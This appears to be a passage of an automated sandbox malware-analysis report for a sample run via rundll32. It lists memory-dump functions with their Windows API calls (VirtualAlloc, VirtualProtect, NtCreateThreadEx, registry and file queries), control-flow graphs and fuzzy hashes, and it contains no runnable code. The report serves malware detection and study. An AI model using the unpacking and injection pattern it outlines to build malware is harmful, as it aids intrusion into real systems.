                    • Opcode Fuzzy Hash: b46c6020b1f91a003066ea05d460942125ac22ade54cf7140133a1bb6b291a75
                    • Instruction Fuzzy Hash: 0471AA76A183508FD304DF39C89051BBBE3BBD9310F1A8929E595D7354DA30E942CBD2
                    Function 050922A8 Relevance: 3.2, APIs: 2, Instructions: 172memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 349 50922a8-50922e2 350 50922e6-509231c 349->350 350->350 351 509231e-509235d VirtualProtect 350->351 352 5092361-509236d 351->352 355 5091d18-5091d20 352->355 355->355 356 5091d22-5091dec call 50947a8 VirtualAlloc call 50947a8 355->356 360 5091df1-5091e8a call 50947a8 * 2 356->360 360->352
                    APIs
                    • VirtualAlloc.KERNEL32(?,?,?,?,?,-00000001,-00000001), ref: 05091DAA
                    • VirtualProtect.KERNEL32(?,00000800,?,?), ref: 0509235A
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974132495.0000000005091000.00000020.00001000.00020000.00000000.sdmp, Offset: 05091000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_5091000_rundll32.jbxd
                    Similarity
                    • API ID: Virtual$AllocProtect
                    • String ID:
                    • API String ID: 2447062925-0
                    • Opcode ID: e3d0b00510a6c716ea44dc0f727e4e475cbbcd87a214dbe7fa62648bb9f1230c
                    • Instruction ID: efd2b076cce1660b0478bb018419da48feeab4533cbbc30e8377d8e5dcfec124
                    • Opcode Fuzzy Hash: e3d0b00510a6c716ea44dc0f727e4e475cbbcd87a214dbe7fa62648bb9f1230c
                    • Instruction Fuzzy Hash: 4761A1726083418FD718CF29C844BAAFBE6FBD5310F15CA6ED099CB3A5DA349506CB51
                    Function 0696F1F3 Relevance: 2.9, APIs: 1, Instructions: 1367COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a169decebb04fcb7fdcaccf8f336471ad5d269e727fc6404a969b3606431e339
                    • Instruction ID: 07bd4ed7a633524775492ad3c0ea3a1d29bd4a78343c834e2a00e8b47d7ef755
                    • Opcode Fuzzy Hash: a169decebb04fcb7fdcaccf8f336471ad5d269e727fc6404a969b3606431e339
                    • Instruction Fuzzy Hash: 85B2F636A183518FD778CF29C9C47DAF7E6BBC8310F198A2DD489CB644DB74A9058B81
                    Function 06962790 Relevance: 1.9, APIs: 1, Instructions: 355libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 48e0eabbb4ae28cc54ba223bbad3ab6ebf4dd52f885b0bcd90a142c3ea5cda38
                    • Instruction ID: 35b1eaec45828559de800337ec6d7eef1f433cc138a7144b5b881c89fa5920cd
                    • Opcode Fuzzy Hash: 48e0eabbb4ae28cc54ba223bbad3ab6ebf4dd52f885b0bcd90a142c3ea5cda38
                    • Instruction Fuzzy Hash: 04F18E72D002298BDB24CF29C8407ADB7B2FF89310F2581AAD549B7754D774AE86CF90
                    Function 06984F10 Relevance: 1.7, APIs: 1, Instructions: 243registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExW.KERNEL32(?,?,?,?,?), ref: 069850C4
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 07ba154feed452149765af5d8f88be256ab3c9b9ef3414ed4a3e84978e7b9a31
                    • Instruction ID: 331e8aec502243bc3082f92fad95a080fba73263fbb36bc4583b3598dd2af1a2
                    • Opcode Fuzzy Hash: 07ba154feed452149765af5d8f88be256ab3c9b9ef3414ed4a3e84978e7b9a31
                    • Instruction Fuzzy Hash: B8A1A837A186518FD764DF29C48065AF7E2BFC8310F16896DE999AB364DB30EC05CB81
                    Function 0696C5E0 Relevance: 1.7, APIs: 1, Instructions: 231registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegQueryValueExW.KERNEL32(?,?,?,?,?,?), ref: 0696C871
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: QueryValue
                    • String ID:
                    • API String ID: 3660427363-0
                    • Opcode ID: 788919a6737212ca35df3920784e08da19885da45767fffcd0d019ef971503aa
                    • Instruction ID: c354761f709ce8db2817b260eb018ce3ebff42a28b3ca72e02f6340dd9c97159
                    • Opcode Fuzzy Hash: 788919a6737212ca35df3920784e08da19885da45767fffcd0d019ef971503aa
                    • Instruction Fuzzy Hash: B0A18F76A08751CFD724CF29C880A6AB7E2FFC8310F56892DE5959B364D731B906CB81
                    Function 06966790 Relevance: 1.7, APIs: 1, Instructions: 215nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtQueryDirectoryObject.NTDLL(?,?,?,?,?,?,?), ref: 069668F2
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: DirectoryObjectQuery
                    • String ID:
                    • API String ID: 1728361593-0
                    • Opcode ID: 9604ca454e3b85f1d9d02cf78795dabdbda044f066ac707dbc01df5cce46ee91
                    • Instruction ID: 67326aa633061c65d85705d60e5280bd9ca62be0f1b31450fc133d1ed2bcb72f
                    • Opcode Fuzzy Hash: 9604ca454e3b85f1d9d02cf78795dabdbda044f066ac707dbc01df5cce46ee91
                    • Instruction Fuzzy Hash: BB817136A087518FD714CF2AC84066BF7E3BBC9314F158A2DE99597364DA71EC06CB82
                    Function 06962220 Relevance: 1.7, APIs: 1, Instructions: 215memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 06962400
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: fcccb4885bc07a5ef542f2356ae95b7f5855203db94123c3575300d7f0a00fd2
                    • Instruction ID: 35202aba8141b5f33280676c99fb208c77d1cc57297f8763dba197936e9bad16
                    • Opcode Fuzzy Hash: fcccb4885bc07a5ef542f2356ae95b7f5855203db94123c3575300d7f0a00fd2
                    • Instruction Fuzzy Hash: 30914A36E002198FDB14CFAAC8409DEB7B7BBC8314F66816AD455BB615DB31AD46CF80
                    Function 0696CD00 Relevance: 1.7, APIs: 1, Instructions: 206COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    • API String ID: 1863332320-0
                    • Opcode ID: ac8bd1260cc08786d6420d79abb257bce1753f8d82768ff65909674cbcebbea3
                    • Instruction ID: 28f56903a2f0654aa7b6cd8adfea7471956ed3acb2ec31756ac44533468facb1
                    • Opcode Fuzzy Hash: ac8bd1260cc08786d6420d79abb257bce1753f8d82768ff65909674cbcebbea3
                    • Instruction Fuzzy Hash: D9913976E00619CFDB14CFA9C8405AEFBB2BF88310F2A855AE455BB355D730A946CF90
                    Function 051BA660 Relevance: 1.7, APIs: 1, Instructions: 199memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 383 51ba660-51ba6d9 384 51ba6df-51ba702 383->384 385 51ba6db-51ba6dc 384->385 386 51ba704-51ba716 384->386 385->384 387 51ba71c-51ba747 386->387 388 51ba812-51ba825 386->388 389 51ba74b-51ba755 387->389 390 51ba7a3-51ba7ad 389->390 391 51ba757-51ba7a1 VirtualAllocExNuma 389->391 393 51ba7af-51ba7b3 390->393 394 51ba7b5-51ba7bf 390->394 392 51ba806-51ba80c 391->392 392->388 392->389 393->392 395 51ba828-51ba8f7 394->395 396 51ba7c1-51ba7cb 394->396 395->392 397 51ba7cd-51ba7e1 396->397 398 51ba7e3-51ba7ed 396->398 397->392 398->392 399 51ba7ef-51ba802 398->399 399->392
                    APIs
                    • VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?), ref: 051BA78C
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974409517.00000000051B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 051B1000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_51b1000_rundll32.jbxd
                    Similarity
                    • API ID: AllocNumaVirtual
                    • String ID:
                    • API String ID: 4233825816-0
                    • Opcode ID: cc17bf8bf7b8521daabe671ef5e95a176c2ff15e2fd192ffce3c66b18d0aa888
                    • Instruction ID: d285df8dd59fb3da003eac478e2f14e8ef18771674ce14f6dcd3a6f3bef4465b
                    • Opcode Fuzzy Hash: cc17bf8bf7b8521daabe671ef5e95a176c2ff15e2fd192ffce3c66b18d0aa888
                    • Instruction Fuzzy Hash: 6571D4766183408FD728CF29D891AABB7E2BFC8310F15891DE595C7390DB75E805CB81
                    Function 051BA900 Relevance: 1.7, APIs: 1, Instructions: 188memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 402 51ba900-51ba99d 403 51ba9ba-51ba9cf 402->403 404 51ba99f-51ba9b8 402->404 405 51baabe-51baad1 403->405 406 51ba9d5-51ba9ef 403->406 404->403 404->404 407 51ba9f5-51ba9ff 406->407 408 51baa9f-51baab3 407->408 409 51baa05-51baa0f 407->409 410 51baab6-51baab8 408->410 411 51baa96-51baa9d 409->411 412 51baa15-51baa1e 409->412 410->405 410->407 411->410 413 51baa82-51baa94 412->413 414 51baa20-51baa2a 412->414 413->410 415 51baa2c-51baa72 VirtualProtect 414->415 416 51baa74-51baa7e 414->416 415->410 417 51baad2-51baba2 416->417 418 51baa80 416->418 417->410 418->410
                    APIs
                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 051BAA5A
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974409517.00000000051B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 051B1000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_51b1000_rundll32.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: f324245993c85820f50afd8322b93ed0ad540b5f9b4c567e25ce2ae0dba8eef2
                    • Instruction ID: 564176bf3ea4ed97f23950869488665b3473f20138b1bc0729af61bf60139704
                    • Opcode Fuzzy Hash: f324245993c85820f50afd8322b93ed0ad540b5f9b4c567e25ce2ae0dba8eef2
                    • Instruction Fuzzy Hash: E371A07A6083418FD324CF29D98059BB7E3FFC8314F568A2DE48997354EB70A906CB91
                    Function 0696C3A0 Relevance: 1.7, APIs: 1, Instructions: 169registryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: 767198e3a11f2a2df5bec3a3536b6e1c9a3c2f5e4e34b5e356eb149fd948a2ad
                    • Instruction ID: cd7052099c26d4cc35d7c71df7b93b020ba961cacb2636ff7a516d039ba10a96
                    • Opcode Fuzzy Hash: 767198e3a11f2a2df5bec3a3536b6e1c9a3c2f5e4e34b5e356eb149fd948a2ad
                    • Instruction Fuzzy Hash: 7F5180326487418FD714DF2AD98052BB7E3BBC8310F258A2DF1D587798DA74E842CB92
                    Function 0695D53D Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                    Download Yara Rule
                    APIs
                    • DeviceIoControl.KERNEL32(?,?,?,?,?,?,?,?), ref: 0695D5E0
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: ControlDevice
                    • String ID:
                    • API String ID: 2352790924-0
                    • Opcode ID: ffc4dcd6f373af87793254392fd7652a2e6a5d6824dc7a3e7dcb572dd0120fa5
                    • Instruction ID: 22faf08eb32000c1cd260d775dc977f9e41d1c646f424082351313f12b7fe585
                    • Opcode Fuzzy Hash: ffc4dcd6f373af87793254392fd7652a2e6a5d6824dc7a3e7dcb572dd0120fa5
                    • Instruction Fuzzy Hash: E451B3326092428FC324CF28C890AAAB7F3FFD9314F66851DE59587654DB35E85BCB42
                    Function 051B2084 Relevance: 1.7, APIs: 1, Instructions: 157nativethreadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 421 51b2084-51b2085 422 51b2087-51b20f4 NtCreateThreadEx 421->422 423 51b2104-51b210c 421->423 424 51b20f6-51b20ff 422->424 425 51b210e-51b2116 423->425 426 51b2160 423->426 428 51b205c-51b205e 424->428 429 51b2118-51b2120 425->429 430 51b2142-51b215b 425->430 427 51b2163-51b2167 426->427 427->428 431 51b2060-51b2072 428->431 432 51b2077-51b207f 428->432 433 51b216c-51b21ca 429->433 434 51b2122-51b212a 429->434 430->428 431->427 432->421 437 51b21d4-51b21fe 433->437 434->428 435 51b2130-51b213f 434->435 437->437 438 51b2200-51b2299 437->438 438->424
                    APIs
                    • NtCreateThreadEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?), ref: 051B20D8
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974409517.00000000051B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 051B1000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_51b1000_rundll32.jbxd
                    Similarity
                    • API ID: CreateThread
                    • String ID:
                    • API String ID: 2422867632-0
                    • Opcode ID: 3dbb75f47456da23a5d8d384a929dbb8fe954c1872de9d0006430f73d7cc1b54
                    • Instruction ID: e04350555c6d3f137816e0de26e1da28286cc2f90bcc7a64a1384392588c2ea2
                    • Opcode Fuzzy Hash: 3dbb75f47456da23a5d8d384a929dbb8fe954c1872de9d0006430f73d7cc1b54
                    • Instruction Fuzzy Hash: 2E614B76A10129DFDB14CFA8CC81ADDBBB3BF88210F168195D559BB210DB70A985CF80
                    Function 0696A5D6 Relevance: 1.7, APIs: 1, Instructions: 152registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegEnumKeyExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0696A600
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: Enum
                    • String ID:
                    • API String ID: 2928410991-0
                    • Opcode ID: 672eff21dba37621b949097737f1f096509734d17498992a3e7b2677e9444d13
                    • Instruction ID: 2ca12c0d37bc07a3158724b526b21e46a67edb26fd2088bd23edeeb6805162e4
                    • Opcode Fuzzy Hash: 672eff21dba37621b949097737f1f096509734d17498992a3e7b2677e9444d13
                    • Instruction Fuzzy Hash: FD515C72E10219CFDB54CFA9C940AADBBB2FF88310F268159E559BB245D730AD51CF90
                    Function 06982A81 Relevance: 1.6, APIs: 1, Instructions: 142fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 06982A9E
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: FileFindFirst
                    • String ID:
                    • API String ID: 1974802433-0
                    • Opcode ID: 94eb86fb9bac9cdde7928f82997da02ea2350c75b42e5cdf1ee264ddfd476bff
                    • Instruction ID: 4ca151decd8a9663008c9cdf680b86b59c72fc01ce5c56363ede114f14a5d86e
                    • Opcode Fuzzy Hash: 94eb86fb9bac9cdde7928f82997da02ea2350c75b42e5cdf1ee264ddfd476bff
                    • Instruction Fuzzy Hash: 2651B232908211CFC760DF28C480A5AB7F2FF99314F19896DE9989B265D335FD02CB82
                    Function 06966CBB Relevance: 1.6, APIs: 1, Instructions: 142threadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateThread.KERNEL32(?,?,?,?,?,?), ref: 06966CFA
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: CreateThread
                    • String ID:
                    • API String ID: 2422867632-0
                    • Opcode ID: 40d14b3e22d287b5d2051fd87e79f363c3cc37635b91fd757e1d425264605c1e
                    • Instruction ID: 333e175610afc798128e3492973231bafe07a0d159399c9aec8d898d6dd495da
                    • Opcode Fuzzy Hash: 40d14b3e22d287b5d2051fd87e79f363c3cc37635b91fd757e1d425264605c1e
                    • Instruction Fuzzy Hash: 59512976E102198FDF54CFA9CC41A9DBBB2FF88314F258155E619A7240DB30AD828F80
                    Function 0696CB60 Relevance: 1.6, APIs: 1, Instructions: 136libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 68845412f1f8c00e639b7141a7afe252b7db84a9512af0afa4e29646599bbba6
                    • Instruction ID: 3d050f10a6931013ac7885fd86f4514242d3dd42dbfcdc02bfba88eef5eda9b4
                    • Opcode Fuzzy Hash: 68845412f1f8c00e639b7141a7afe252b7db84a9512af0afa4e29646599bbba6
                    • Instruction Fuzzy Hash: D6510872E002198FDB54CFA9C9446ADF7B6BF88210F2A8169E549BB355D730AD46CF80
                    Function 06962625 Relevance: 1.6, APIs: 1, Instructions: 132threadCOMMON
                    Download Yara Rule
                    APIs
                    • RtlExitUserThread.NTDLL(?), ref: 06962642
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: ExitThreadUser
                    • String ID:
                    • API String ID: 3424019298-0
                    • Opcode ID: d090393607ed9a504fad0c6d26abd3ce3bf337f749d5e48932d172889504932e
                    • Instruction ID: d58d291029006c88141b2eb16104317d8af2fc07dff1f663f302bb2530bb8f20
                    • Opcode Fuzzy Hash: d090393607ed9a504fad0c6d26abd3ce3bf337f749d5e48932d172889504932e
                    • Instruction Fuzzy Hash: BD416F32614B018FD364DF29D98092BB7E3BBD8310B258A2DE196C7668DB34F946CF51
                    Function 06970206 Relevance: 1.6, APIs: 1, Instructions: 131fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 06970248
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 589d4955094dd7d3f48eb0392c39227512b29059f54e13aaa01ae95da83ef475
                    • Instruction ID: 9922207ac5101047b5dddfc7fa4154740156f48ea43291147f81ec9138fe6ba3
                    • Opcode Fuzzy Hash: 589d4955094dd7d3f48eb0392c39227512b29059f54e13aaa01ae95da83ef475
                    • Instruction Fuzzy Hash: CA518F32A082019FD728CF28C981A5FB7E3FFC4310F158A1CE59997694DB31E816CB92
                    Function 0696D969 Relevance: 1.6, APIs: 1, Instructions: 129nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0696D9A0
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: InformationQuerySystem
                    • String ID:
                    • API String ID: 3562636166-0
                    • Opcode ID: b21697dbc24e72d721af0452414746d68cbb95c5d00c9acf3831514771a15256
                    • Instruction ID: d3766e4ddc68eb95790561d1b796a1b61a9705193abdc0913241de559a792b65
                    • Opcode Fuzzy Hash: b21697dbc24e72d721af0452414746d68cbb95c5d00c9acf3831514771a15256
                    • Instruction Fuzzy Hash: 1A514D36E001198FDF68CF69C890AADFBB2FF84304F658199D15AA7254DB30AD86CF40
                    Function 05091EAF Relevance: 1.6, APIs: 1, Instructions: 302memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • VirtualAlloc.KERNEL32(?,?,?,?,?,-00000001,-00000001), ref: 05091DAA
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974132495.0000000005091000.00000020.00001000.00020000.00000000.sdmp, Offset: 05091000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_5091000_rundll32.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: ec85074d655eab4c25d1ee8e6a7d15bf753b8f39bc93c574f1eb7e68fcb0bb4a
                    • Instruction ID: 62384ea28070100262432dd06f8a8039154dfdf9a970ccebcddc1da8022967cf
                    • Opcode Fuzzy Hash: ec85074d655eab4c25d1ee8e6a7d15bf753b8f39bc93c574f1eb7e68fcb0bb4a
                    • Instruction Fuzzy Hash: ACB1D4B6A053408FC728CF2AC8957EEF7E6BFD9310F15862E949ECB354DA7499058B40
                    Function 0695D090 Relevance: 1.5, APIs: 1, Instructions: 231memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNEL32(?,?,?,?), ref: 0695D262
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: bccaee92416edb22b98f3268f3edfb76e6790b76b0d9f901ee7f1f18dfe11cdc
                    • Instruction ID: 8a83744a868c7dab77b9300be6d0cb438ba727460a9e82a187bf16c9205929eb
                    • Opcode Fuzzy Hash: bccaee92416edb22b98f3268f3edfb76e6790b76b0d9f901ee7f1f18dfe11cdc
                    • Instruction Fuzzy Hash: DCA11976D002198FDB14CFA9C88059DFBB6BF98314F26815AD919BB355DB30AD86CF80
                    Function 0696E3E0 Relevance: 1.5, APIs: 1, Instructions: 211COMMON
                    Download Yara Rule
                    APIs
                    • VirtualFree.KERNELBASE(?,?,?), ref: 0696E56F
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID:
                    • API String ID: 1263568516-0
                    • Opcode ID: 2d8938debb5f9f16d0f6021b687533f62f6f78b057add00fdd4dca05fc19d225
                    • Instruction ID: 2d569aab1f858ab1a3bc7c27260cb265429a3ef8713f199b589071d9421feeb2
                    • Opcode Fuzzy Hash: 2d8938debb5f9f16d0f6021b687533f62f6f78b057add00fdd4dca05fc19d225
                    • Instruction Fuzzy Hash: 12817D76A083418FD754CF29C84055BB7E7BBC8310F2A8A2DE591E7354EA30F846CB82
                    Function 06984C60 Relevance: 1.4, APIs: 1, Instructions: 180COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: CloseHandle
                    • String ID:
                    • API String ID: 2962429428-0
                    • Opcode ID: ef9dee0fc3183b642fab97eddbfaf300793006bd5e85c5530f9988698d18aa42
                    • Instruction ID: 9442df125149f5af654715c5d4c6b0cb565c3c495c4ca3bfe5c65530e69aa4e8
                    • Opcode Fuzzy Hash: ef9dee0fc3183b642fab97eddbfaf300793006bd5e85c5530f9988698d18aa42
                    • Instruction Fuzzy Hash: 5061BB3A6083518FD314DF29C88062AB7E2BFC8714F268A1EE5959B754DB31FC06CB81
                    Function 05091680 Relevance: 1.4, APIs: 1, Instructions: 168memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 461 5091680-5091cc2 463 5091ce2-5091cfd 461->463 464 5091cc4 461->464 466 5091d04-5091d16 463->466 465 5091cc6-5091ce0 464->465 465->463 465->465 468 5091d18-5091d20 466->468 468->468 469 5091d22-509236d call 50947a8 VirtualAlloc call 50947a8 * 3 468->469 469->466
                    APIs
                    • VirtualAlloc.KERNEL32(?,?,?,?,?,-00000001,-00000001), ref: 05091DAA
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974132495.0000000005091000.00000020.00001000.00020000.00000000.sdmp, Offset: 05091000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_5091000_rundll32.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 6f8631f7027e3959f6d6771ceda15815857577e70d9c9c310292c0030ab7e463
                    • Instruction ID: 0861111de20aaaa0f533a1765669b9c44e5269094131cf9995fcaf29571122bc
                    • Opcode Fuzzy Hash: 6f8631f7027e3959f6d6771ceda15815857577e70d9c9c310292c0030ab7e463
                    • Instruction Fuzzy Hash: 2461B1B5A143448FD718CF29C844BABFBE6BBD9310F11856EA099CB394DB34D906CB51
                    Function 051B71D2 Relevance: 1.4, APIs: 1, Instructions: 140COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 479 51b71d2-51b7215 VirtualFree 480 51b7218-51b7221 479->480 481 51b7176-51b7178 480->481 482 51b717a-51b718c 481->482 483 51b718e-51b7196 481->483 482->481 484 51b719c-51b71aa 483->484 485 51b7243-51b725b 483->485 486 51b7231-51b7240 484->486 487 51b71b0-51b71b8 484->487 485->481 488 51b71be-51b71c6 487->488 489 51b7260-51b7363 487->489 490 51b71c8-51b71d0 488->490 491 51b7226-51b722c 488->491 489->480 490->479 490->481 491->481
                    APIs
                    • VirtualFree.KERNELBASE(?,?,?), ref: 051B71EF
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974409517.00000000051B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 051B1000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_51b1000_rundll32.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID:
                    • API String ID: 1263568516-0
                    • Opcode ID: d180cb7dd4e12f56e38f5f88f01830def669272931dc7f4406c485e215432e26
                    • Instruction ID: a1f136d194841585bfef38dc85f687d9cbdd77015646bc627a6edf21c030718f
                    • Opcode Fuzzy Hash: d180cb7dd4e12f56e38f5f88f01830def669272931dc7f4406c485e215432e26
                    • Instruction Fuzzy Hash: FE511877E001198FDB24CFA8D941ADDFBB2FF98314F26819AD509B7240DB70A9428F90
                    Function 06983C00 Relevance: .9, Instructions: 868COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
